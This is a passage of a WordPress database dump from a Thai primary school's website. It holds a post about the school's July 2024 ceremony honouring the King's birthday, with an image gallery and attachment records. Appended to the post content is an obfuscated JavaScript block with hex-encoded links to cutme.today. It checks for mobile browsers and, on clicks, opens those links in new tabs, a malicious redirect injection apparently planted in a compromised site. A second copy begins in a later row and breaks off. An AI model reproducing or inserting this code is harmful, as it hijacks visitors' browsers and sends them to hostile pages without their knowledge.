src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/S__29622275-1024x768.jpg\" alt=\"\" class=\"wp-image-258\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":259,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/S__32849967-1024x785.jpg\" alt=\"\" class=\"wp-image-259\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":261,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/S__68788230_0-1024x576.jpg\" alt=\"\" class=\"wp-image-261\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/S__68788232_0-1024x768.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":262,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/S__68788233_0-1024x576.jpg\" alt=\"\" class=\"wp-image-262\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":263,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/S__68788234_0-1024x576.jpg\" alt=\"\" class=\"wp-image-263\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":264,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/S__68788235_0-1024x576.jpg\" alt=\"\" class=\"wp-image-264\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":265,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/S__68788236_0-1024x576.jpg\" alt=\"\" class=\"wp-image-265\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":266,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/S__68788237_0-1024x576.jpg\" alt=\"\" class=\"wp-image-266\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','กิจกรรมเฉลิมพระเกียรติพระบาทสมเด็จพระเจ้าอยู่หัว เนื่องในโอกาพระราชพิธีมหามงคลเฉลิมพระชนพรรษา 6 รอบ 28 กรกฎาคม 2567','','publish','closed','closed','','%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%80%e0%b8%89%e0%b8%a5%e0%b8%b4%e0%b8%a1%e0%b8%9e%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%81%e0%b8%b5%e0%b8%a2%e0%b8%a3%e0%b8%95%e0%b8%b4','','','2024-07-28 23:08:01','2024-07-28 16:08:01','',0,'http://pakhaeng.ssk.in.th/?p=245',0,'post','',0),
(246,1,'2024-07-28 23:05:39','2024-07-28 16:05:39','','154849','','inherit','','closed','','154849','','','2024-07-28 23:05:39','2024-07-28 16:05:39','',245,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/154849.jpg',0,'attachment','image/jpeg',0),
(247,1,'2024-07-28 23:05:39','2024-07-28 16:05:39','','154850','','inherit','','closed','','154850','','','2024-07-28 23:05:39','2024-07-28 16:05:39','',245,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/154850.jpg',0,'attachment','image/jpeg',0),
(248,1,'2024-07-28 23:05:39','2024-07-28 16:05:39','','154842','','inherit','','closed','','154842','','','2024-07-28 23:05:39','2024-07-28 16:05:39','',245,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/154842.jpg',0,'attachment','image/jpeg',0),
(249,1,'2024-07-28 23:05:39','2024-07-28 16:05:39','','154845','','inherit','','closed','','154845','','','2024-07-28 23:05:39','2024-07-28 16:05:39','',245,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/154845.jpg',0,'attachment','image/jpeg',0),
(250,1,'2024-07-28 23:05:39','2024-07-28 16:05:39','','154855','','inherit','','closed','','154855','','','2024-07-28 23:05:39','2024-07-28 16:05:39','',245,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/154855.jpg',0,'attachment','image/jpeg',0),
(251,1,'2024-07-28 23:05:39','2024-07-28 16:05:39','','154847','','inherit','','closed','','154847','','','2024-07-28 23:05:39','2024-07-28 16:05:39','',245,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/154847.jpg',0,'attachment','image/jpeg',0),
(252,1,'2024-07-28 23:05:41','2024-07-28 16:05:41','','1578490','','inherit','','closed','','1578490','','','2024-07-28 23:05:41','2024-07-28 16:05:41','',245,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/1578490.jpg',0,'attachment','image/jpeg',0),
(253,1,'2024-07-28 23:05:41','2024-07-28 16:05:41','','1578485','','inherit','','closed','','1578485','','','2024-07-28 23:05:41','2024-07-28 16:05:41','',245,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/1578485.jpg',0,'attachment','image/jpeg',0),
(254,1,'2024-07-28 23:05:42','2024-07-28 16:05:42','','S__15794195','','inherit','','closed','','s__15794195','','','2024-07-28 23:05:42','2024-07-28 16:05:42','',245,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/S__15794195.jpg',0,'attachment','image/jpeg',0),
(255,1,'2024-07-28 23:05:42','2024-07-28 16:05:42','','S__15794198','','inherit','','closed','','s__15794198','','','2024-07-28 23:05:42','2024-07-28 16:05:42','',245,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/S__15794198.jpg',0,'attachment','image/jpeg',0),
(256,1,'2024-07-28 23:05:42','2024-07-28 16:05:42','','S__15794204','','inherit','','closed','','s__15794204','','','2024-07-28 23:05:42','2024-07-28 16:05:42','',245,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/S__15794204.jpg',0,'attachment','image/jpeg',0),
(257,1,'2024-07-28 23:05:42','2024-07-28 16:05:42','','S__15794210','','inherit','','closed','','s__15794210','','','2024-07-28 23:05:42','2024-07-28 16:05:42','',245,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/S__15794210.jpg',0,'attachment','image/jpeg',0),
(258,1,'2024-07-28 23:05:44','2024-07-28 16:05:44','','S__29622275','','inherit','','closed','','s__29622275','','','2024-07-28 23:05:44','2024-07-28 16:05:44','',245,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/S__29622275.jpg',0,'attachment','image/jpeg',0),
(259,1,'2024-07-28 23:05:45','2024-07-28 16:05:45','','S__32849967','','inherit','','closed','','s__32849967','','','2024-07-28 23:05:45','2024-07-28 16:05:45','',245,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/S__32849967.jpg',0,'attachment','image/jpeg',0),
(260,1,'2024-07-28 23:05:47','2024-07-28 16:05:47','','S__68788232_0','','inherit','','closed','','s__68788232_0','','','2024-07-28 23:05:47','2024-07-28 16:05:47','',245,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/S__68788232_0.jpg',0,'attachment','image/jpeg',0),
(261,1,'2024-07-28 23:05:48','2024-07-28 16:05:48','','S__68788230_0','','inherit','','closed','','s__68788230_0','','','2024-07-28 23:05:48','2024-07-28 16:05:48','',245,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/S__68788230_0.jpg',0,'attachment','image/jpeg',0),
(262,1,'2024-07-28 23:05:48','2024-07-28 16:05:48','','S__68788233_0','','inherit','','closed','','s__68788233_0','','','2024-07-28 23:05:48','2024-07-28 16:05:48','',245,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/S__68788233_0.jpg',0,'attachment','image/jpeg',0),
(263,1,'2024-07-28 23:05:48','2024-07-28 16:05:48','','S__68788234_0','','inherit','','closed','','s__68788234_0','','','2024-07-28 23:05:48','2024-07-28 16:05:48','',245,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/S__68788234_0.jpg',0,'attachment','image/jpeg',0),
(264,1,'2024-07-28 23:05:48','2024-07-28 16:05:48','','S__68788235_0','','inherit','','closed','','s__68788235_0','','','2024-07-28 23:05:48','2024-07-28 16:05:48','',245,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/S__68788235_0.jpg',0,'attachment','image/jpeg',0),
(265,1,'2024-07-28 23:05:48','2024-07-28 16:05:48','','S__68788236_0','','inherit','','closed','','s__68788236_0','','','2024-07-28 23:05:48','2024-07-28 16:05:48','',245,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/S__68788236_0.jpg',0,'attachment','image/jpeg',0),
(266,1,'2024-07-28 23:05:50','2024-07-28 16:05:50','','S__68788237_0','','inherit','','closed','','s__68788237_0','','','2024-07-28 23:05:50','2024-07-28 16:05:50','',245,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/S__68788237_0.jpg',0,'attachment','image/jpeg',0),
(267,1,'2024-07-28 23:05:57','2024-07-28 16:05:57','','28-67','','inherit','','closed','','28-67','','','2024-07-28 23:05:57','2024-07-28 16:05:57','',245,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/28-67.png',0,'attachment','image/png',0),
(268,1,'2024-07-28 23:06:27','2024-07-28 16:06:27','<!-- wp:paragraph -->\n<p><strong>เนื่องในโอกาพระราชพิธีมหามงคลเฉลิมพระชนพรรษา 6 รอบ</strong><strong></strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>28 กรกฎาคม 2567</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>วันที่ 28 กรกฎาคม พ.ศ.2567 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ เข้าร่วมกิจกรรมเฉลิมพระเกียรติพระบาทสมเด็จพระเจ้าอยู่หัว เนื่องในโอกาสพระราชพิธีมหามงคลเฉลิมพระชนมพรรษา 6 รอบ 28 กรกฎาคม 2567 ณ หอประชุมที่ว่าการอำเภอโนนคูณ อำเภอโนนคูณ จังหวัดศรีสะเกษ โดยได้ร่วมทำพิธีเจริญพระพุทธมนต์ ทำบุญตักบาตรถวายเป็นพระราชกุศล พิธีถวายสัตย์ปฏิญาณเพื่อเป็นข้าราชการที่ดีและพลังของแผ่นดินและพิธีลงนามถวายพระพร และพิธีถวายราชสักการะและจุดเทียนถวายพระพรชัยมงคล กิจกรรมในครั้งนี้ เพื่อน้อมรำลึกในพระมหากรุณาธิคุณ และแสดงความจงรักภักดีต่อสถาบันชาติ ศาสนา และพระมหากษัตริย์ อีกทั้งเพื่อเสริมสร้างความรักความสามัคคีแก่ปวงชนชาวไทยที่มีสถาบันพระมหากษัตริย์เป็นศูนย์รวมใจอีกด้วย</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":248,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/154842.jpg\" alt=\"\" class=\"wp-image-248\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":249,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/154845-1024x682.jpg\" alt=\"\" class=\"wp-image-249\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":251,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/154847-1024x682.jpg\" alt=\"\" class=\"wp-image-251\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":246,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/154849-1024x682.jpg\" alt=\"\" class=\"wp-image-246\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":247,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/154850-1024x682.jpg\" alt=\"\" class=\"wp-image-247\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":250,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/154855-713x1024.jpg\" alt=\"\" class=\"wp-image-250\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":253,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/1578485-1024x578.jpg\" alt=\"\" class=\"wp-image-253\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":252,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/1578490-578x1024.jpg\" alt=\"\" class=\"wp-image-252\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":254,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/S__15794195-1024x768.jpg\" alt=\"\" class=\"wp-image-254\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":255,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/S__15794198-1024x768.jpg\" alt=\"\" class=\"wp-image-255\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":256,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/S__15794204-1024x768.jpg\" alt=\"\" class=\"wp-image-256\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":257,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/S__15794210-1024x768.jpg\" alt=\"\" class=\"wp-image-257\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":258,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/S__29622275-1024x768.jpg\" alt=\"\" class=\"wp-image-258\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":259,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/S__32849967-1024x785.jpg\" alt=\"\" class=\"wp-image-259\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":261,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/S__68788230_0-1024x576.jpg\" alt=\"\" class=\"wp-image-261\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/S__68788232_0-1024x768.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":262,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/S__68788233_0-1024x576.jpg\" alt=\"\" class=\"wp-image-262\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":263,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/S__68788234_0-1024x576.jpg\" alt=\"\" class=\"wp-image-263\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":264,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/S__68788235_0-1024x576.jpg\" alt=\"\" class=\"wp-image-264\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":265,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/S__68788236_0-1024x576.jpg\" alt=\"\" class=\"wp-image-265\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":266,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/S__68788237_0-1024x576.jpg\" alt=\"\" class=\"wp-image-266\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return 